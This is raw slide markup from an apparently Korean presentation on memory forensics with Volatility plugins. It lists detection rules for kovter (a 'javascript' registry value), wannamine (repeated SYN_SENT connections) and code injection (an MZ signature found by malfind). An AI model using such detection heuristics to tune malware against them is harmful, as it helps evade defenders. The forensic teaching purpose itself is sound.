          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printkey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : Volatility Plug-in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;323;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{585E100A-7599-488F-A0A2-80F065500C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3223591"/>
            <a:ext cx="11582400" cy="683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kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;324;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2397D46-B0D6-4FC7-BC17-35AD301F1F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283208" y="3795479"/>
            <a:ext cx="16245840" cy="1348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ntuser.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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파일은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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사용자별</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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정보를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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 알 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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파일</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just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1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>-&gt; Rule : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>레지스트리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> 키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Value에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>javascript”라는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>문자열이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>포함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>되어 있는가</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Google Shape;326;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C137DDC7-5B57-40C5-A84A-3DD441838C7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84280"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384600" y="5276792"/>
            <a:ext cx="12255200" cy="142224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oogle Shape;326;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408CDFA5-E2CB-4BB4-A09D-6DFE5D24D80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5020" b="364"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384600" y="6667500"/>
            <a:ext cx="12255200" cy="313183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81B4A24-851A-4D5D-81A6-84A021B426F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="6210300"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F94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212579C-D9CA-4CCA-95B6-799335E21FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="7353300"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F94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35465D17-AF8F-4DFB-B270-9AB0329D6CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996696" y="2477561"/>
            <a:ext cx="2338472" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>hivelist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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1601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수행의 시작/종료 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163EF5AC-960F-4530-935B-12E84DD901A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996696" y="2477561"/>
            <a:ext cx="2338472" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>netscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : Volatility Plug-in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;346;p23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA35701-C078-4D04-9CBE-7A25C78F72A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969264" y="3190633"/>
            <a:ext cx="11582400" cy="683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wannamine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;347;p23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085446D3-FBE2-49FE-9DCC-33A73B58574A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3859889"/>
            <a:ext cx="14759556" cy="1348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SYN_SENT를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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보내는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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IP가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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많았고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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하위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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프로세스인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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SearchProtocol이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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반복하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just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1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>-&gt; Rule : 15회</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> 이상의 동작이 발견된다면 의심으로 판단</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Google Shape;349;p23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7DF8A5-AA12-43F6-B7B5-79F118B5485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6269" r="28" b="28429"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="5207910"/>
            <a:ext cx="12244956" cy="468558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28471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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>추가 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600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5C2A2CB-E6F9-4916-9ADC-8576B9F74425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1022684" y="2552700"/>
            <a:ext cx="15068976" cy="1840394"/>
            <a:chOff x="1899179" y="3666541"/>
            <a:chExt cx="14040241" cy="1840394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="순서도: 수행의 시작/종료 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D262B2BA-B7CC-49D9-9B7A-1F64B1418214}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1899179" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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800" b="1" dirty="0" err="1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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>malfind</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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64BD9A6-8E0E-4B63-8F30-9717D0056041}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4674908" y="3666541"/>
              <a:ext cx="11264512" cy="1840394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fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Code </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>또는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DLL Injection </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>행위가 있는지를 나타내는 플러그인</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just" fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>-&gt; Rule : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>해당 표 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>String </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>속성에서 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>MZ signature</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>가 나올 경우</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>해당 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>signature</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>는 실행파일을 뜻하며 실행파일 안에서 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Injection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>이 될 가능성이 높기 때문에 의심프로세스로 표시함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26FEAEA-B8A5-4435-AC6F-33ACD9A286E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1022684" y="4899636"/>
            <a:ext cx="15068976" cy="1840394"/>
            <a:chOff x="1899179" y="3666541"/>
            <a:chExt cx="14040241" cy="1840394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="순서도: 수행의 시작/종료 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB3EABA-CAD0-45EC-997E-91B7D1C72F78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1899179" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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800" b="1" dirty="0" err="1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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>ldrmodules</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri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A2FB16A-E0B6-4EC3-A2E7-298D0B83F990}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4674908" y="3666541"/>
              <a:ext cx="11264512" cy="1840394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fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>로드된</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="240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en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>들을 나타내며 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>dlllist</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>에서 탐지 못한 링크되지 않은 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DLL </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>까지 나타내는 플러그인</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
